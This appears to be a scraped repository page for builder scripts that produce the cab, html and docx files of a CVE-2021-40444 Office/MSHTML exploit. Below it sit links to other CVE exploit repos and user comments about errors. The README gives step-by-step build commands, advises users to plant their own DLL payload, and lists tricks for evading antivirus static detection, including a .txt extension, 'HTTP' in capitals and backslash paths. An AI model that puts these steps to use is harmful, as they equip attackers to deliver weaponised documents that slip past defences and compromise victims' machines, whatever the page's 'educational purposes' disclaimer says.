This repo contain builders of cab file, html file, and docx file for CVE-2021-40444 exploit

Overview

CVE-2021-40444 builders

This repo contain builders of cab file, html file, and docx file for CVE-2021-40444 exploit. This repo is just for testing, research and educational purposes. You are responsible for how you use the code provided in this repo.

The code is developed by reversing malware samples found in wild and shared by various security researchers.

The builders for this CVE are already public. The purpose of this repo is to check how effectively we can bypass static detections by different AV vendors for the docx files, at the time of writing.

The JS code can easily obfuscated by online tools or manually. But the docx file contains just one file which is document.xml.rels, on which the signatures can be based. What we can tamper in it so we can evade static detections of most of the AV.

The cabrc.exe is Microsoft exe included in Internet Explorer Administration Kit and can be downloaded from https://docs.microsoft.com/en-us/internet-explorer/ie11-ieak/ieak-information-and-downloads and after installation you would find this exe in "C:\Program Files (x86)\Windows IEAK 11"

There are 3 builders.

The code works for python 2.7

First go to CVE-2021-40444 folder and place your dll file there and rename it to IEcache.inf (or you can use the calc dll already there).

Then go to source folder and generate the cab file

c:\cve-2021-40444\sources\python generate_cab.py

Upload your cab file, and using the cab file URL generate the html file

c:\cve-2021-40444\sources\python generate_html.py http://192.168.1.12/new/winupdate.cab tests.txt (Note instead of using html extension, if we use .txt the exploit still works, but bypasses AV)

Now finally upload your html file and generate the doc file. Use HTTP (capital) instead of http, and "" instead of "/", to bypass AV. And we dont need x-usc: too.

example: c:\cve-2021-40444\sources\python\generate_html.py generate_doc.py HTTP:\\192.168.1.12\new\tests.txt

The result is in front of you.







www.aslitsecurity.com
[email protected]

You might also like...
A scanner and a proof of sample exploit for log4j RCE CVE-2021-44228

1.Create a Sample Vulnerable Application . 2.Start a netcat listner . 3.Run the exploit . 5.Use jdk1.8.0_20 for better results . Exploit-db - https://

Exploit for CVE-2021-3129

laravel-exploits Exploit for CVE-2021-3129

Proof of Concept Exploit for vCenter CVE-2021-21972
Proof of Concept Exploit for vCenter CVE-2021-21972

CVE-2021-21972 Proof of Concept Exploit for vCenter CVE-2021-21972

cve-2021-21985 exploit
cve-2021-21985 exploit

cve-2021-21985 exploit 0x01 漏洞点 分析可见: https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=home#rapid7-analysis 0x02 exploit 对beans对象进行重新构

Proof on Concept Exploit for CVE-2021-38647 (OMIGOD)
Proof on Concept Exploit for CVE-2021-38647 (OMIGOD)

OMIGOD Proof on Concept Exploit for CVE-2021-38647 (OMIGOD) For background information and context, read the our blog post detailing this vulnerabilit

Exploit for GitLab CVE-2021-22205 Unauthenticated Remote Code Execution

Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files tha

Exploit-CVE-2021-21086

CVE-2021-21086 Exploit This exploit allows to execute a shellcode in the context of the rendering process of Adobe Acrobat Reader DC 2020.013.20074 an

Proof of Concept Exploit for ManageEngine ServiceDesk Plus CVE-2021-44077
Proof of Concept Exploit for ManageEngine ServiceDesk Plus CVE-2021-44077

CVE-2021-44077 Proof of Concept Exploit for CVE-2021-44077: PreAuth RCE in ManageEngine ServiceDesk Plus 11306 Based on: https://xz.aliyun.com/t/106

A proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228)
A proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228)

CVE-2021-44228 – Log4j RCE Unauthenticated About This is a proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228). This vulnerability

Comments
  • question

    question

    Is that something wrong with the path:“example: c:\cve-2021-40444\sources\python\generate_html.py generate_doc.py HTTP:\192.168.1.12\new\tests.txt” maybe we need amended to "python generate_doc.py HTTP:\192.168.1.12\new\tests.txt"

    opened by WRPZKB 5
  • python generate_cab.py  error

    python generate_cab.py error

    Traceback (most recent call last): File "generate_cab.py", line 12, in subprocess.call(args) File "/usr/lib/python2.7/subprocess.py", line 172, in call return Popen(*popenargs, **kwargs).wait() File "/usr/lib/python2.7/subprocess.py", line 394, in init errread, errwrite) File "/usr/lib/python2.7/subprocess.py", line 1047, in _execute_child raise child_exception OSError: [Errno 2] No such file or directory

    opened by hunter-00 2
Owner
ASL IT Security
ASL IT Security
log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

说明 about author: 我超怕的 blog: https://www.cnblogs.com/iAmSoScArEd/ github: https://github.com/iAmSOScArEd/ date: 2021-12-20 log4j2 dos exploit log4j2 do

null 3 Aug 13, 2022
AnonStress-Stored-XSS-Exploit - An exploit and demonstration on how to exploit a Stored XSS vulnerability in anonstress

AnonStress Stored XSS Exploit An exploit and demonstration on how to exploit a S

صلى الله على محمد وآله 3 Jun 22, 2022
DNSpooq - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)

dnspooq DNSpooq PoC - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685) For educational purposes only Requirements Docker compo

Teppei Fukuda 80 Nov 28, 2022
This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798).

CVE-2021-43798 – Grafana Exploit About This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798

Pedro Havay 12 Nov 18, 2022
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user Known issues it will not work outside kali , i will update it

Hossam 867 Dec 22, 2022
Exploiting CVE-2021-42278 and CVE-2021-42287

noPac Exploiting CVE-2021-42278 and CVE-2021-42287 原项目noPac在实现上可能有点问题,导致在本地没有打通,于是参考sam-the-admin项目进行修改。 使用 pip3 install -r requirements.txt # GetShel

W4ter 2 Jun 23, 2022
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

About Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user Changed from sam-the-admin. Usage SAM THE ADMIN CVE-202

Evi1cg 500 Jan 6, 2023
Details,PoC and patches for CVE-2021-45383 & CVE-2021-45384

CVE-2021-45383 & CVE-2021-45384 There are several network-layer vulnerabilities in the official server of Minecraft: Bedrock Edition (aka Bedrock Serv

null 20 Apr 7, 2022
ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF->GetWebShell)

ProxyLogon For Python3 ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF->GetWebShell) usage: python ProxyLogon.py --host=exchang

null 112 Dec 1, 2022
Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket.

PrintNightmare Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket. Installtion $ pip3 install impacket

Oliver Lyak 140 Dec 27, 2022